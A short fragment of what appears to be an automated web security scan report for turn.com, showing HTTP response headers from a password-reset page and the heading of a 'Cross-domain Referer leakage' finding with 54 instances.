Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: guid=3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse; Domain=.turn.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:44 GMT
Content-Length: 4218


                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Co
...[SNIP]...

11. Cross-domain Referer leakage  previous  next
There are 54 instances of this issue: